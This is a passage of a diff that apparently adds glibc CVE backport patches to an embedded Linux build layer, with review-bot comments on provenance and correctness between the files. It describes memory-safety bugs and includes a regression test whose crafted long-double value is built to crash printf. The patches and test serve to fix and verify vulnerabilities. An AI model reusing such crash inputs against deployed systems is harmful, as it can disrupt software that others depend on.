+@@ -656,7 +656,7 @@
+
+ Here the dtv needs to be updated to new_gen generation count.
+
+- This code may be called during TLS access when GL(dl_load_lock)
++ This code may be called during TLS access when GL(dl_load_tls_lock)
+ is not held. In that case the user code has to synchronize with
+ dlopen and dlclose calls of relevant modules. A module m is
+ relevant if the generation of m <= new_gen and dlclose of m is
+@@ -778,11 +778,11 @@
+ if (__glibc_unlikely (the_map->l_tls_offset
+ != FORCED_DYNAMIC_TLS_OFFSET))
+ {
+- __rtld_lock_lock_recursive (GL(dl_load_lock));
++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
+ if (__glibc_likely (the_map->l_tls_offset == NO_TLS_OFFSET))
+ {
+ the_map->l_tls_offset = FORCED_DYNAMIC_TLS_OFFSET;
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+ }
+ else if (__glibc_likely (the_map->l_tls_offset
+ != FORCED_DYNAMIC_TLS_OFFSET))
+@@ -794,7 +794,7 @@
+ #else
+ # error "Either TLS_TCB_AT_TP or TLS_DTV_AT_TP must be defined"
+ #endif
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+
+ dtv[GET_ADDR_MODULE].pointer.to_free = NULL;
+ dtv[GET_ADDR_MODULE].pointer.val = p;
+@@ -802,7 +802,7 @@
+ return (char *) p + GET_ADDR_OFFSET;
+ }
+ else
+- __rtld_lock_unlock_recursive (GL(dl_load_lock));
++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+ }
+ struct dtv_pointer result = allocate_and_init (the_map);
+ dtv[GET_ADDR_MODULE].pointer = result;
+@@ -873,7 +873,7 @@
+ return NULL;
+
+ dtv_t *dtv = THREAD_DTV ();
+- /* This may be called without holding the GL(dl_load_lock). Reading
++ /* This may be called without holding the GL(dl_load_tls_lock). Reading
+ arbitrary gen value is fine since this is best effort code. */
+ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
+ if (__glibc_unlikely (dtv[0].counter != gen))
+diff --git a/elf/rtld.c b/elf/rtld.c
+index 8d2bba3d43..9642eb9c92 100644
+--- a/elf/rtld.c
++++ b/elf/rtld.c
+@@ -283,6 +283,7 @@
+ #ifdef _LIBC_REENTRANT
+ ._dl_load_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
+ ._dl_load_write_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
++ ._dl_load_tls_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
+ #endif
+ ._dl_nns = 1,
+ ._dl_ns =
+diff --git a/sysdeps/nptl/fork.c b/sysdeps/nptl/fork.c
+index c471f7b15f..021691b9b7 100644
+--- a/sysdeps/nptl/fork.c
++++ b/sysdeps/nptl/fork.c
+@@ -125,6 +125,9 @@
+ /* Reset the lock the dynamic loader uses to protect its data. */
+ __rtld_lock_initialize (GL(dl_load_lock));
+
++ /* Reset the lock protecting dynamic TLS related data. */
++ __rtld_lock_initialize (GL(dl_load_tls_lock));
++
+ /* Run the handlers registered for the child. */
+ __run_fork_handlers (atfork_run_child, multiple_threads);
+ }
+diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
+index d49529da0d..9ec1511bb0 100644
+--- a/sysdeps/generic/ldsodefs.h
++++ b/sysdeps/generic/ldsodefs.h
+@@ -369,6 +369,13 @@
+ list of loaded objects while an object is added to or removed
+ from that list. */
+ __rtld_lock_define_recursive (EXTERN, _dl_load_write_lock)
++ /* This lock protects global and module specific TLS related data.
++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
++ accessed and when TLS related relocations are processed for a
++ module. It was introduced to keep pthread_create accessing TLS
++ state that is being set up. */
++ __rtld_lock_define_recursive (EXTERN, _dl_load_tls_lock)
+
+ /* Incremented whenever something may have been added to dl_loaded. */
+ EXTERN unsigned long long _dl_load_adds;
+@@ -1153,7 +1160,7 @@
+
+ /* Add module to slot information data. If DO_ADD is false, only the
+ required memory is allocated. Must be called with GL
+- (dl_load_lock) acquired. If the function has already been called
++ (dl_load_tls_lock) acquired. If the function has already been called
+ for the link map L with !do_add, then this function will not raise
+ an exception, otherwise it is possible that it encounters a memory
+ allocation failure. */
+--
+2.27.0
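Review bot: The provenance fields of this backport disagree: the `From` line names commit `83b5323261bb72313bffcf37476c1b8f0847c736`, while `Upstream-Status: Backport` links `h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5`, so a later audit cannot tell from the file which upstream change it was derived from. I would make the two agree, or explain the second hash in the header, e.g. `Comment: refreshed from <commit the refresh was based on>; From line kept from <original commit>`. The summary is stale as well: it says `10 files changed, 235 insertions(+), 12 deletions(-)` but lists seven files, and in `elf/dl-open.c` the headers `@@ -57,6 +57,9 @@` and `@@ -473,7 +473,7 @@` do not account for the three lines added by the first hunk, which suggests the hunks were edited by hand rather than regenerated from a 2.31 tree. The new comment in `elf/dl-close.c` also has a typo, `specitic`.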
diff --git a/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch b/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch
new file mode 100644
index 0000000000..1e75f2d29d
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch
@@ -0,0 +1,128 @@
+From 681900d29683722b1cb0a8e565a0585846ec5a61 Mon Sep 17 00:00:00 2001
+From: Florian Weimer <fweimer@redhat.com>
+Date: Tue, 22 Sep 2020 19:07:48 +0200
+Subject: [PATCH] x86: Harden printf against non-normal long double values (bug
+ 26649)
+
+The behavior of isnan/__builtin_isnan on bit patterns that do not
+correspond to something that the CPU would produce from valid inputs
+is currently under-defined in the toolchain. (The GCC built-in and
+glibc disagree.)
+
+The isnan check in PRINTF_FP_FETCH in stdio-common/printf_fp.c
+assumes the GCC behavior that returns true for non-normal numbers
+which are not specified as NaN. (The glibc implementation returns
+false for such numbers.)
+
+At present, passing non-normal numbers to __mpn_extract_long_double
+causes this function to produce irregularly shaped multi-precision
+integers, triggering undefined behavior in __printf_fp_l.
+
+With GCC 10 and glibc 2.32, this behavior is not visible because
+__builtin_isnan is used, which avoids calling
+__mpn_extract_long_double in this case. This commit updates the
+implementation of __mpn_extract_long_double so that regularly shaped
+multi-precision integers are produced in this case, avoiding
+undefined behavior in __printf_fp_l.
+
+Upstream-Status: Backport [git://sourceware.org/git/glibc.git]
+CVE: CVE-2020-29573
+Signed-off-By: Armin Kuster <akuster@mvista.com>
+
+---
+ sysdeps/x86/Makefile | 4 ++
+ sysdeps/x86/ldbl2mpn.c | 8 ++++
+ sysdeps/x86/tst-ldbl-nonnormal-printf.c | 52 +++++++++++++++++++++++++
+ 3 files changed, 64 insertions(+)
+ create mode 100644 sysdeps/x86/tst-ldbl-nonnormal-printf.c
+
+Index: git/sysdeps/x86/Makefile
+===================================================================
+--- git.orig/sysdeps/x86/Makefile
++++ git/sysdeps/x86/Makefile
+@@ -9,6 +9,10 @@ tests += tst-get-cpu-features tst-get-cp
+ tests-static += tst-get-cpu-features-static
+ endif
+
++ifeq ($(subdir),math)
++tests += tst-ldbl-nonnormal-printf
++endif # $(subdir) == math
++
+ ifeq ($(subdir),setjmp)
+ gen-as-const-headers += jmp_buf-ssp.sym
+ sysdep_routines += __longjmp_cancel
+Index: git/sysdeps/x86/tst-ldbl-nonnormal-printf.c
+===================================================================
+--- /dev/null
++++ git/sysdeps/x86/tst-ldbl-nonnormal-printf.c
+@@ -0,0 +1,52 @@
++/* Test printf with x86-specific non-normal long double value.
++ Copyright (C) 2020 Free Software Foundation, Inc.
++
++ This file is part of the GNU C Library.
++
++ The GNU C Library is free software; you can redistribute it and/or
++ modify it under the terms of the GNU Lesser General Public
++ License as published by the Free Software Foundation; either
++ version 2.1 of the License, or (at your option) any later version.
++
++ The GNU C Library is distributed in the hope that it will be useful,
++ but WITHOUT ANY WARRANTY; without even the implied warranty of
++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ Lesser General Public License for more details.
++
++ You should have received a copy of the GNU Lesser General Public
++ License along with the GNU C Library; if not, see
++ <https://www.gnu.org/licenses/>. */
++
++#include <stdio.h>
++#include <string.h>
++#include <support/check.h>
++
++/* Fill the stack with non-zero values. This makes a crash in
++ snprintf more likely. */
++static void __attribute__ ((noinline, noclone))
++fill_stack (void)
++{
++ char buffer[65536];
++ memset (buffer, 0xc0, sizeof (buffer));
++ asm ("" ::: "memory");
++}
++
++static int
++do_test (void)
++{
++ fill_stack ();
++
++ long double value;
++ memcpy (&value, "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04", 10);
++
++ char buf[30];
++ int ret = snprintf (buf, sizeof (buf), "%Lg", value);
++ TEST_COMPARE (ret, strlen (buf));
++ if (strcmp (buf, "nan") != 0)
++ /* If snprintf does not recognize the non-normal number as a NaN,
++ it has added the missing explicit MSB. */
++ TEST_COMPARE_STRING (buf, "3.02201e-4624");
++ return 0;
++}
++
++#include <support/test-driver.c>
+Index: git/sysdeps/i386/ldbl2mpn.c
+===================================================================
+--- git.orig/sysdeps/i386/ldbl2mpn.c
++++ git/sysdeps/i386/ldbl2mpn.c
+@@ -115,6 +115,12 @@ __mpn_extract_long_double (mp_ptr res_pt
+ && res_ptr[N - 1] == 0)
+ /* Pseudo zero. */
+ *expt = 0;
+-
++ else
++ /* The sign bit is explicit, but add it in case it is missing in
++ the input. Otherwise, callers will not be able to produce the
++ expected multi-precision integer layout by shifting the sign
++ bit into the MSB. */
++ res_ptr[N - 1] |= (mp_limb_t) 1 << (LDBL_MANT_DIG - 1
++ - ((N - 1) * BITS_PER_MP_LIMB));
+ return N;
+ }
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
new file mode 100644
index 0000000000..7561e87121
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch
@@ -0,0 +1,68 @@
+From 42d359350510506b87101cf77202fefcbfc790cb Mon Sep 17 00:00:00 2001
+From: Andreas Schwab <schwab@linux-m68k.org>
+Date: Thu, 27 May 2021 12:49:47 +0200
+Subject: [PATCH] Use __pthread_attr_copy in mq_notify (bug 27896)
+
+Make a deep copy of the pthread attribute object to remove a potential
+use-after-free issue.
+
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+diff --git a/NEWS b/NEWS
+index 8a20d3c4e3..be489243ac 100644
+--- a/NEWS
++++ b/NEWS
+@@ -7,6 +7,10 @@ using `glibc' in the "product" field.
+
+ Version 2.31.1
+
++ CVE-2021-33574: The mq_notify function has a potential use-after-free
++ issue when using a notification type of SIGEV_THREAD and a thread
++ attribute with a non-default affinity mask.
++
+ The following bugs are resolved with this release:
+ [14231] stdio-common tests memory requirements
+ [19519] iconv(1) with -c option hangs on illegal multi-byte sequences
+diff --git a/sysdeps/unix/sysv/linux/mq_notify.c b/sysdeps/unix/sysv/linux/mq_notify.c
+index f288bac477..dd47f0b777 100644
+--- a/sysdeps/unix/sysv/linux/mq_notify.c
++++ b/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -135,8 +135,11 @@ helper_thread (void *arg)
+ (void) __pthread_barrier_wait (&notify_barrier);
+ }
+ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
+- /* The only state we keep is the copy of the thread attributes. */
+- free (data.attr);
++ {
++ /* The only state we keep is the copy of the thread attributes. */
++ pthread_attr_destroy (data.attr);
++ free (data.attr);
++ }
+ }
+ return NULL;
+ }
+@@ -257,8 +260,7 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
+ if (data.attr == NULL)
+ return -1;
+
+- memcpy (data.attr, notification->sigev_notify_attributes,
+- sizeof (pthread_attr_t));
++ __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
+ }
+
+ /* Construct the new request. */
+@@ -272,7 +274,10 @@ mq_notify (mqd_t mqdes, const struct sigevent *notification)
+
+ /* If it failed, free the allocated memory. */
+ if (__glibc_unlikely (retval != 0))
+- free (data.attr);
++ {
++ pthread_attr_destroy (data.attr);
++ free (data.attr);
++ }
+
+ return retval;
+ }
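Review bot: The call `__pthread_attr_copy (data.attr, notification->sigev_notify_attributes);` in `mq_notify` discards the return value, and the `retval != 0` path now runs `pthread_attr_destroy (data.attr)` whether or not an attribute block was allocated. The description of CVE-2021-33574_2.patch names both problems (an uninitialized attribute after a failed copy, and a null pointer dereference when no attribute was allocated), so this file is not safe to carry on its own. Its header should say so, e.g. `Comment: Incomplete without CVE-2021-33574_2.patch; apply both.` `Upstream-Status: Backport` also gives no commit link here, although the `From` line carries the hash. `mq_notify` and `helper_thread` are only partly visible in the hunks.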
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
new file mode 100644
index 0000000000..396cd7fc0e
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch
@@ -0,0 +1,73 @@
+From 217b6dc298156bdb0d6aea9ea93e7e394a5ff091 Mon Sep 17 00:00:00 2001
+From: Florian Weimer <fweimer@redhat.com>
+Date: Tue, 1 Jun 2021 17:51:41 +0200
+Subject: [PATCH] Fix use of __pthread_attr_copy in mq_notify (bug 27896)
+
+__pthread_attr_copy can fail and does not initialize the attribute
+structure in that case.
+
+If __pthread_attr_copy is never called and there is no allocated
+attribute, pthread_attr_destroy should not be called, otherwise
+there is a null pointer dereference in rt/tst-mqueue6.
+
+Fixes commit 42d359350510506b87101cf77202fefcbfc790cb
+("Use __pthread_attr_copy in mq_notify (bug 27896)").
+
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+https://sourceware.org/bugzilla/attachment.cgi?id=13497
+
+Upstream-Status: Backport
+CVE: CVE-2021-33574 patch#2
+Signed-off-by: Armin Kuster &lt;akuster@mvista.com&gt;
+
+---
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -260,7 +260,34 @@ mq_notify (mqd_t mqdes, const struct sig
+ if (data.attr == NULL)
+ return -1;
+
+- __pthread_attr_copy (data.attr, notification->sigev_notify_attributes);
++ memcpy (data.attr, notification->sigev_notify_attributes,
++ sizeof (pthread_attr_t));
++
++ struct pthread_attr *source =
++ (struct pthread_attr *) (notification->sigev_notify_attributes);
++ struct pthread_attr *target = (struct pthread_attr *) (data.attr);
++ cpu_set_t *newp;
++ cpu_set_t *cpuset = source->cpuset;
++ size_t cpusetsize = source->cpusetsize;
++
++ /* alloc a new memory for cpuset to avoid use after free */
++ if (cpuset != NULL && cpusetsize > 0)
++ {
++ newp = (cpu_set_t *) malloc (cpusetsize);
++ if (newp == NULL)
++ {
++ free(data.attr);
++ return -1;
++ }
++
++ memcpy (newp, cpuset, cpusetsize);
++ target->cpuset = newp;
++ }
++ else
++ {
++ target->cpuset = NULL;
++ target->cpusetsize = 0;
++ }
+ }
+
+ /* Construct the new request. */
+@@ -273,7 +300,7 @@ mq_notify (mqd_t mqdes, const struct sig
+ int retval = INLINE_SYSCALL (mq_notify, 2, mqdes, &se);
+
+ /* If it failed, free the allocated memory. */
+- if (__glibc_unlikely (retval != 0))
++ if (retval != 0 && data.attr != NULL)
+ {
+ pthread_attr_destroy (data.attr);
+ free (data.attr);
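Review bot: The header of this patch describes a fix to the use of `__pthread_attr_copy`, but the first `mq_notify` hunk removes that call and returns to a `memcpy` of the whole `pthread_attr_t` followed by a hand-written duplicate of `cpuset`, so the description and the code disagree. The open-coded copy is presumably only correct while `cpuset` is the sole heap-owned member of `struct pthread_attr` in this glibc version, which the patch does not state. A header line such as `Comments: adapted, cpuset is duplicated by hand instead of calling __pthread_attr_copy`, plus a matching code comment above the `memcpy`, would make the deviation from the cited upstream commit visible to an auditor. The `Signed-off-by` trailer as shown here also carries HTML-escaped `&lt;`/`&gt;` instead of angle brackets. `mq_notify` starts and ends outside the inner hunks.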
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
new file mode 100644
index 0000000000..36fd4a61b2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch
@@ -0,0 +1,41 @@
+From b805aebd42364fe696e417808a700fdb9800c9e8 Mon Sep 17 00:00:00 2001
+From: Nikita Popov <npv1310@gmail.com>
+Date: Mon, 9 Aug 2021 20:17:34 +0530
+Subject: [PATCH] librt: fix NULL pointer dereference (bug 28213)
+
+Helper thread frees copied attribute on NOTIFY_REMOVED message
+received from the OS kernel. Unfortunately, it fails to check whether
+copied attribute actually exists (data.attr != NULL). This worked
+earlier because free() checks passed pointer before actually
+attempting to release corresponding memory. But
+__pthread_attr_destroy assumes pointer is not NULL.
+
+So passing NULL pointer to __pthread_attr_destroy will result in
+segmentation fault. This scenario is possible if
+notification->sigev_notify_attributes == NULL (which means default
+thread attributes should be used).
+
+Signed-off-by: Nikita Popov <npv1310@gmail.com>
+Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-38604
+Signed-off-by: Armin Kuser <akuster@mvista.com>
+
+---
+ sysdeps/unix/sysv/linux/mq_notify.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/sysdeps/unix/sysv/linux/mq_notify.c
+===================================================================
+--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c
++++ git/sysdeps/unix/sysv/linux/mq_notify.c
+@@ -134,7 +134,7 @@ helper_thread (void *arg)
+ to wait until it is done with it. */
+ (void) __pthread_barrier_wait (&notify_barrier);
+ }
+- else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED)
++ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED && data.attr != NULL)
+ {
+ /* The only state we keep is the copy of the thread attributes. */
+ pthread_attr_destroy (data.attr);
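Review bot: The backporter's trailer reads `Signed-off-by: Armin Kuser <akuster@mvista.com>`, which looks like a misspelling of the name used in CVE-2021-33574_2.patch (`Armin Kuster`), and `Upstream-Status: Backport` gives no commit reference. The one-line guard `&& data.attr != NULL` in `helper_thread` is the whole fix, so a pinned reference such as `Upstream-Status: Backport [<upstream commit URL>]` is what lets a later audit confirm it matches upstream. `helper_thread` continues outside the inner hunk.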
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
new file mode 100644
index 0000000000..10c7e5666d
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-0687.patch
@@ -0,0 +1,82 @@
+From 952aff5c00ad7c6b83c3f310f2643939538827f8 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?=D0=9B=D0=B5=D0=BE=D0=BD=D0=B8=D0=B4=20=D0=AE=D1=80=D1=8C?=
+ =?UTF-8?q?=D0=B5=D0=B2=20=28Leonid=20Yuriev=29?= <leo@yuriev.ru>
+Date: Sat, 4 Feb 2023 14:41:38 +0300
+Subject: [PATCH] gmon: Fix allocated buffer overflow (bug 29444)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The `__monstartup()` allocates a buffer used to store all the data
+accumulated by the monitor.
+
+The size of this buffer depends on the size of the internal structures
+used and the address range for which the monitor is activated, as well
+as on the maximum density of call instructions and/or callable functions
+that could be potentially on a segment of executable code.
+
+In particular a hash table of arcs is placed at the end of this buffer.
+The size of this hash table is calculated in bytes as
+ p->fromssize = p->textsize / HASHFRACTION;
+
+but actually should be
+ p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
+
+This results in writing beyond the end of the allocated buffer when an
+added arc corresponds to a call near from the end of the monitored
+address range, since `_mcount()` check the incoming caller address for
+monitored range but not the intermediate result hash-like index that
+uses to write into the table.
+
+It should be noted that when the results are output to `gmon.out`, the
+table is read to the last element calculated from the allocated size in
+bytes, so the arcs stored outside the buffer boundary did not fall into
+`gprof` for analysis. Thus this "feature" help me to found this bug
+during working with https://sourceware.org/bugzilla/show_bug.cgi?id=29438
+
+Just in case, I will explicitly note that the problem breaks the
+`make test t=gmon/tst-gmon-dso` added for Bug 29438.
+There, the arc of the `f3()` call disappears from the output, since in
+the DSO case, the call to `f3` is located close to the end of the
+monitored range.
+
+Signed-off-by: Леонид Юрьев (Leonid Yuriev) <leo@yuriev.ru>
+
+Another minor error seems a related typo in the calculation of
+`kcountsize`, but since kcounts are smaller than froms, this is
+actually to align the p->froms data.
+
+Co-authored-by: DJ Delorie <dj@redhat.com>
+Reviewed-by: Carlos O'Donell <carlos@redhat.com>
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commit;h=801af9fafd4689337ebf27260aa115335a0cb2bc]
+CVE: CVE-2023-0687
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ gmon/gmon.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/gmon/gmon.c b/gmon/gmon.c
+index dee6480..bf76358 100644
+--- a/gmon/gmon.c
++++ b/gmon/gmon.c
+@@ -132,6 +132,8 @@ __monstartup (u_long lowpc, u_long highpc)
+ p->lowpc = ROUNDDOWN(lowpc, HISTFRACTION * sizeof(HISTCOUNTER));
+ p->highpc = ROUNDUP(highpc, HISTFRACTION * sizeof(HISTCOUNTER));
+ p->textsize = p->highpc - p->lowpc;
++ /* This looks like a typo, but it's here to align the p->froms
++ section. */
+ p->kcountsize = ROUNDUP(p->textsize / HISTFRACTION, sizeof(*p->froms));
+ p->hashfraction = HASHFRACTION;
+ p->log_hashfraction = -1;
+@@ -142,7 +144,7 @@ __monstartup (u_long lowpc, u_long highpc)
+ instead of integer division. Precompute shift amount. */
+ p->log_hashfraction = ffs(p->hashfraction * sizeof(*p->froms)) - 1;
+ }
+- p->fromssize = p->textsize / HASHFRACTION;
++ p->fromssize = ROUNDUP(p->textsize / HASHFRACTION, sizeof(*p->froms));
+ p->tolimit = p->textsize * ARCDENSITY / 100;
+ if (p->tolimit < MINARCS)
+ p->tolimit = MINARCS;
+--
+2.7.4
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
new file mode 100644
index 0000000000..c7db4038c2
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4813.patch
@@ -0,0 +1,986 @@
+From 1c37b8022e8763fedbb3f79c02e05c6acfe5a215 Mon Sep 17 00:00:00 2001
+From: Siddhesh Poyarekar <siddhesh@sourceware.org>
+Date: Thu, 17 Mar 2022 11:44:34 +0530
+Subject: [PATCH] Simplify allocations and fix merge and continue actions [BZ
+ #28931]
+
+Allocations for address tuples is currently a bit confusing because of
+the pointer chasing through PAT, making it hard to observe the sequence
+in which allocations have been made. Narrow scope of the pointer
+chasing through PAT so that it is only used where necessary.
+
+This also tightens actions behaviour with the hosts database in
+getaddrinfo to comply with the manual text. The "continue" action
+discards previous results and the "merge" action results in an immedate
+lookup failure. Consequently, chaining of allocations across modules is
+no longer necessary, thus opening up cleanup opportunities.
+
+A test has been added that checks some combinations to ensure that they
+work correctly.
+
+Resolves: BZ #28931
+
+CVE: CVE-2023-4813
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=1c37b8022e8763fedbb3f79c02e05c6acfe5a215]
+Comments: Hunks refreshed
+
+Signed-off-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
+Reviewed-by: DJ Delorie <dj@redhat.com>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ nss/Makefile | 1 +
+ nss/tst-nss-gai-actions.c | 149 ++++++
+ nss/tst-nss-gai-actions.root/etc/host.conf | 1 +
+ nss/tst-nss-gai-actions.root/etc/hosts | 508 +++++++++++++++++++++
+ sysdeps/posix/getaddrinfo.c | 143 +++---
+ 5 files changed, 750 insertions(+), 52 deletions(-)
+ create mode 100644 nss/tst-nss-gai-actions.c
+ create mode 100644 nss/tst-nss-gai-actions.root/etc/host.conf
+ create mode 100644 nss/tst-nss-gai-actions.root/etc/hosts
+
+diff --git a/nss/Makefile b/nss/Makefile
+index 42a59535cb..d8b06b44fb 100644
+--- a/nss/Makefile
++++ b/nss/Makefile
+@@ -61,6 +61,7 @@
+
+ tests-container = \
+ tst-nss-test3 \
++ tst-nss-gai-actions \
+ tst-nss-files-hosts-long \
+ tst-nss-db-endpwent \
+ tst-nss-db-endgrent
+diff --git a/nss/tst-nss-gai-actions.c b/nss/tst-nss-gai-actions.c
+new file mode 100644
+index 0000000000..efca6cd183
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.c
+@@ -0,0 +1,149 @@
++/* Test continue and merge NSS actions for getaddrinfo.
++ Copyright The GNU Toolchain Authors.
++ This file is part of the GNU C Library.
++
++ The GNU C Library is free software; you can redistribute it and/or
++ modify it under the terms of the GNU Lesser General Public
++ License as published by the Free Software Foundation; either
++ version 2.1 of the License, or (at your option) any later version.
++
++ The GNU C Library is distributed in the hope that it will be useful,
++ but WITHOUT ANY WARRANTY; without even the implied warranty of
++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ Lesser General Public License for more details.
++
++ You should have received a copy of the GNU Lesser General Public
++ License along with the GNU C Library; if not, see
++ <https://www.gnu.org/licenses/>. */
++
++#include <dlfcn.h>
++#include <gnu/lib-names.h>
++#include <nss.h>
++#include <stdio.h>
++#include <stdlib.h>
++#include <string.h>
++
++#include <support/check.h>
++#include <support/format_nss.h>
++#include <support/support.h>
++#include <support/xstdio.h>
++#include <support/xunistd.h>
++
++enum
++{
++ ACTION_MERGE = 0,
++ ACTION_CONTINUE,
++};
++
++static const char *
++family_str (int family)
++{
++ switch (family)
++ {
++ case AF_UNSPEC:
++ return "AF_UNSPEC";
++ case AF_INET:
++ return "AF_INET";
++ default:
++ __builtin_unreachable ();
++ }
++}
++
++static const char *
++action_str (int action)
++{
++ switch (action)
++ {
++ case ACTION_MERGE:
++ return "merge";
++ case ACTION_CONTINUE:
++ return "continue";
++ default:
++ __builtin_unreachable ();
++ }
++}
++
++static void
++do_one_test (int action, int family, bool canon)
++{
++ struct addrinfo hints =
++ {
++ .ai_family = family,
++ };
++
++ struct addrinfo *ai;
++
++ if (canon)
++ hints.ai_flags = AI_CANONNAME;
++
++ printf ("***** Testing \"files [SUCCESS=%s] files\" for family %s, %s\n",
++ action_str (action), family_str (family),
++ canon ? "AI_CANONNAME" : "");
++
++ int ret = getaddrinfo ("example.org", "80", &hints, &ai);
++
++ switch (action)
++ {
++ case ACTION_MERGE:
++ if (ret == 0)
++ {
++ char *formatted = support_format_addrinfo (ai, ret);
++
++ printf ("merge unexpectedly succeeded:\n %s\n", formatted);
++ support_record_failure ();
++ free (formatted);
++ }
++ else
++ return;
++ case ACTION_CONTINUE:
++ {
++ char *formatted = support_format_addrinfo (ai, ret);
++
++ /* Verify that the result appears exactly once. */
++ const char *expected = "address: STREAM/TCP 192.0.0.1 80\n"
++ "address: DGRAM/UDP 192.0.0.1 80\n"
++ "address: RAW/IP 192.0.0.1 80\n";
++
++ const char *contains = strstr (formatted, expected);
++ const char *contains2 = NULL;
++
++ if (contains != NULL)
++ contains2 = strstr (contains + strlen (expected), expected);
++
++ if (contains == NULL || contains2 != NULL)
++ {
++ printf ("continue failed:\n%s\n", formatted);
++ support_record_failure ();
++ }
++
++ free (formatted);
++ break;
++ }
++ default:
++ __builtin_unreachable ();
++ }
++}
++
++static void
++do_one_test_set (int action)
++{
++ char buf[32];
++
++ snprintf (buf, sizeof (buf), "files [SUCCESS=%s] files",
++ action_str (action));
++ __nss_configure_lookup ("hosts", buf);
++
++ do_one_test (action, AF_UNSPEC, false);
++ do_one_test (action, AF_INET, false);
++ do_one_test (action, AF_INET, true);
++}
++
++static int
++do_test (void)
++{
++ do_one_test_set (ACTION_CONTINUE);
++ do_one_test_set (ACTION_MERGE);
++ return 0;
++}
++
++#include <support/test-driver.c>
+diff --git a/nss/tst-nss-gai-actions.root/etc/host.conf b/nss/tst-nss-gai-actions.root/etc/host.conf
+new file mode 100644
+index 0000000000..d1a59f73a9
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.root/etc/host.conf
+@@ -0,0 +1 @@
++multi on
+diff --git a/nss/tst-nss-gai-actions.root/etc/hosts b/nss/tst-nss-gai-actions.root/etc/hosts
+new file mode 100644
+index 0000000000..50ce9774dc
+--- /dev/null
++++ b/nss/tst-nss-gai-actions.root/etc/hosts
+@@ -0,0 +1,508 @@
++192.0.0.1 example.org
++192.0.0.2 example.org
++192.0.0.3 example.org
++192.0.0.4 example.org
++192.0.0.5 example.org
++192.0.0.6 example.org
++192.0.0.7 example.org
++192.0.0.8 example.org
++192.0.0.9 example.org
++192.0.0.10 example.org
++192.0.0.11 example.org
++192.0.0.12 example.org
++192.0.0.13 example.org
++192.0.0.14 example.org
++192.0.0.15 example.org
++192.0.0.16 example.org
++192.0.0.17 example.org
++192.0.0.18 example.org
++192.0.0.19 example.org
++192.0.0.20 example.org
++192.0.0.21 example.org
++192.0.0.22 example.org
++192.0.0.23 example.org
++192.0.0.24 example.org
++192.0.0.25 example.org
++192.0.0.26 example.org
++192.0.0.27 example.org
++192.0.0.28 example.org
++192.0.0.29 example.org
++192.0.0.30 example.org
++192.0.0.31 example.org
++192.0.0.32 example.org
++192.0.0.33 example.org
